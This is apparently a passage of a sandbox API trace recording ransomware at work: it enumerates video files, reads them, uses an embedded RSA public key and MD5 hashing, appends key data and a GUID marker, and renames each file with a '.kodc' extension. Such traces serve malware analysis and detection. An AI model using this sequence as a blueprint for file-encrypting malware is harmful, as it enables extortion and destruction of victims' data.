nFileSizeHigh=0x0, nFileSizeLow=0x12f8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jlOAiJaUlU7C6bw.mp4", cAlternateFileName="JLOAIJ~1.MP4")) returned 1 [0100.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.174] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jlOAiJaUlU7C6bw.mp4") returned=".mp4" [0100.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jlOAiJaUlU7C6bw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jloaijaulu7c6bw.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.174] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=77710) returned 1 [0100.175] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.235] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12f68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.235] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.236] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.236] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x12f8e, lpOverlapped=0x0) returned 1 [0100.236] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.236] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.236] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.236] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.237] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.237] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.237] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.237] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.237] GetLastError () returned 0x0 [0100.238] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.238] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.238] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.238] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.238] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.238] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.238] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.238] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x12f90) returned 0x9bb8968 [0100.238] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.238] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.238] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c460 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bd8 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c4a8 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bf0 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c20 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c38 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.239] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c20 | out: hHeap=0x630000) returned 1 [0100.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c38 | out: hHeap=0x630000) returned 1 [0100.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7c38 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7c20 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0100.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0100.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c38 | out: hHeap=0x630000) returned 1 [0100.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c20 | out: hHeap=0x630000) returned 1 [0100.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.240] GetCurrentThreadId () returned 0x42c [0100.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6818 [0100.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.241] GetCurrentThreadId () returned 0x42c [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c20 [0100.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c38 [0100.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.243] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12f8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.244] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.244] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.244] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.244] CloseHandle (hObject=0x5cc) returned 1 [0100.246] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jlOAiJaUlU7C6bw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jloaijaulu7c6bw.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jlOAiJaUlU7C6bw.mp4.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jloaijaulu7c6bw.mp4.kodc")) returned 1 [0100.247] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6edaa750, ftCreationTime.dwHighDateTime=0x1d5c1c1, ftLastAccessTime.dwLowDateTime=0xcf7281f0, ftLastAccessTime.dwHighDateTime=0x1d5b5af, ftLastWriteTime.dwLowDateTime=0xcf7281f0, ftLastWriteTime.dwHighDateTime=0x1d5b5af, nFileSizeHigh=0x0, nFileSizeLow=0xdd83, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k7XpB.mkv", cAlternateFileName="")) returned 1 [0100.247] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\k7XpB.mkv") returned=".mkv" [0100.247] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\k7XpB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k7xpb.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.248] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=56707) returned 1 [0100.248] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.251] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xdd5d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.251] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.252] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xdd83, lpOverlapped=0x0) returned 1 [0100.253] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.253] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.253] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.253] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.254] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.254] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.254] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.254] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.254] GetLastError () returned 0x0 [0100.254] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.254] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.254] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.254] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.254] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xdd80) returned 0x9ba6d90 [0100.254] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c4a8 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bf0 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c4f0 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c08 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c38 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c50 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.255] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c38 | out: hHeap=0x630000) returned 1 [0100.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c50 | out: hHeap=0x630000) returned 1 [0100.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.255] 